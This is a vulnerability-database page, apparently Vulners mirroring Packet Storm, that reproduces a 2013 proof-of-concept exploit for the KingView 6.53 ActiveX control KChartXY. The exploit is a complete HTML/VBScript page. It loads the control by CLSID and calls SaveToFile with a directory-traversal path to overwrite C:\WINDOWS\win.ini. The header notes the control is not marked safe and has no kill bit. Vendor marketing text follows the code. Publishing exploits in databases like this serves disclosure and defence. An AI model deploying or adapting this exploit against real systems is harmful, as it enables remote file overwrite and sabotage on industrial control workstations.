Lucene search
K

KingView 6.53 Active-X File Overwrite / Creation

🗓️ 05 Sep 2013 00:00:00Reported by BlakeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

KingView 6.53 Active-X File Overwrite / Creation - Proof of concept overwrites the win.ini file using KingView ActiveX Control (KChartXY

Code
`<!--  
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite  
Vendor: http://www.wellintech.com  
Version: KingView 6.53  
Tested on: Windows XP SP3 / IE  
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip  
Author: Blake  
  
CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC  
ProgId: KCHARTXYLib.KChartXY  
Path: C:\Program Files\KingView\KChartXY.ocx  
MemberName: SaveToFile  
Safe for scripting: False  
Safe for init: False  
Kill Bit: False  
IObject safety not implemented  
  
Description: Proof of concept overwrites the win.ini file  
-->  
<html>  
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>  
<script language='vbscript'>  
  
arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"  
  
target.SaveToFile arg1  
  
</script>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation